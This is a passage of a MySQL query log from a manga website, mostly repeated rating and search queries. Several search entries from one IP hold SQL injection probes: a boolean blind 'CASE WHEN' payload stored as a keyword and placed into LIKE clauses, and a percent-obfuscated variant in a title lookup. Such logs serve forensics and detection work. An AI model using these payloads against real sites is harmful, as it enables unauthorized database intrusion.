count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330650729 Quit 330650730 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330650730 Quit 330650731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330650731 Quit 330650732 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330650732 Quit 330650733 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330650733 Quit 330650734 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330650734 Quit 330650735 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330650735 Quit 330650736 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330650736 Quit 330650737 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330650737 Quit 330650738 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330650738 Quit 330650739 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330650739 Quit 330650740 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330650740 Quit 330650741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330650741 Quit 330650742 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330650742 Quit 330650743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330650743 Quit 330650744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330650744 Quit 330650745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330650745 Quit 330650746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330650746 Quit 330650747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330650747 Quit 330650748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330650748 Quit 330650749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330650749 Quit 330650750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330650750 Quit 330650751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330650751 Quit 330650752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330650753 Quit 330650754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330650752 Quit 330650754 Quit 330650755 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1And//10406((sELecT//cASE//10406//WHen//10406//theN//1//ElSE//0//end//FROm//RDbdataBasE))-- -', '169.150.196.30', '2026-02-26 03:29:06') 330650756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330650755 Quit 330650756 Quit 330650757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330650757 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1And//10406((sELecT//cASE//10406//WHen//10406//theN//1//ElSE//0//end//FROm//RDbdataBasE))-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1And//10406((sELecT//cASE//10406//WHen//10406//theN//1//ElSE//0//end//FROm//RDbdataBasE))-- -%' ) ) 330650758 Quit 330650759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330650759 Quit 330650760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330650760 Quit 330650761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330650761 Quit 330650762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330650762 Quit 330650757 Quit 330650763 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330650764 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'%A%n%d%/%*%*%/%1%0%4%0%6%=%(%\'%~%\'%|%|%(%s%E%L%e%c%T%/%*%*%/%c%A%S%E%/%*%*%/%1%0%4%0%6%/%*%*%/%W%H%e%n%/%*%*%/%1%0%4%0%6%/%*%*%/%t%h%e%N%/%*%*%/%1%/%*%*%/%E%l%S%E%/%*%*%/%0%/%*%*%/%e%n%d%/%*%*%/%F%R%O%m%/%*%*%/%R%D%b%$%d%a%t%a%B%a%s%E%)%|%|%\'%~%\'%)-- -' 330650763 Quit 330650765 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330650765 Quit 330650766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330650766 Quit 330650767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330650767 Quit 330650768 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330650768 Quit 330650769 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330650769 Quit 330650770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330650770 Quit 330650771 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330650771 Quit 330650772 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330650772 Quit 330650773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330650773 Quit 330650774 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330650774 Quit 330650775 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330650775 Quit 330650776 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330650776 Quit 330650777 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330650777 Quit 330650778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330650778 Quit 330650779 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330650779 Quit 330650780 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330650780 Quit 330650781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330650781 Quit 330650782 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330650782 Quit 330650783 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330650783 Quit 330650784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330650784 Quit 330650785 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330650785 Quit 330650786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330650786 Quit 330650787 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330650787 Quit 330650788 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330650788 Quit 330650789 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330650789 Quit 330650790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330650790 Quit 330650791 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330650791 Quit 330650792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330650792 Quit 330650793 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330650793 Quit 330650794 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330650794 Quit 330650795 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330650795 Quit 330650796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330650796 Quit 330650797 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330650797 Quit 330650798 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330650798 Quit 330650799 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330650799 Quit 330650800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330650800 Quit 330650801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330650801 Quit 330650802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330650802 Quit 330650803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330650803 Quit 330650804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650804 Quit 330650805 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650805 Quit 330650764 Quit 330650806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650806 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330650806 Quit 330650807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650808 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650807 Quit 330650808 Quit 330650809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330650809 Quit 330650810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330650810 Quit 330650811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330650811 Quit 330650812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330650812 Quit 330650813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330650813 Quit 330650814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330650814 Quit 330650815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330650815 Quit 330650816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330650816 Quit 330650817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330650817 Quit 330650818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330650818 Quit 330650819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330650819 Quit 330650820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330650820 Quit 330650821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330650821 Quit 330650822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330650822 Quit 330650823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330650823 Quit 330650824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330650824 Quit 330650825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330650825 Quit 330650826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330650826 Quit 330650827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330650827 Quit 330650828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330650828 Quit 330650829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330650829 Quit 330650830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330650830 Quit 330650831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330650831 Quit 330650832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330650832 Quit 330650833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330650833 Quit 330650834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330650834 Quit 330650835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330650835 Quit 330650836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330650836 Quit 330650837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330650837 Quit 330650838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330650838 Quit 330650839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330650839 Quit 330650840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330650840 Quit 330650841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330650841 Quit 330650842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330650842 Quit 330650843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330650843 Quit 330650844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330650844 Quit 330650845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330650845 Quit 330650846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330650846 Quit 330650847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330650847 Quit 330650848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330650848 Quit 330650849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330650849 Quit 330650850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330650850 Quit 330650851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330650851 Quit 330650852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330650852 Quit 330650853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330650853 Quit 330650854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330650854 Quit 330650855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330650855 Quit 330650856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330650856 Quit 330650857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330650857 Quit 330650858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330650858 Quit 330650859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330650859 Quit 330650860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330650860 Quit 330650861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330650861 Quit 330650862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330650862 Quit 330650863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330650863 Quit 330650864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330650864 Quit 330650865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330650865 Quit 330650866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330650866 Quit 330650867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330650867 Quit 330650868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330650868 Quit 330650869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330650869 Quit 330650870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330650870 Quit 330650871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330650871 Quit 330650872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330650872 Quit 330650873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330650873 Quit 330650874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330650874 Quit 330650875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330650875 Quit 330650876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 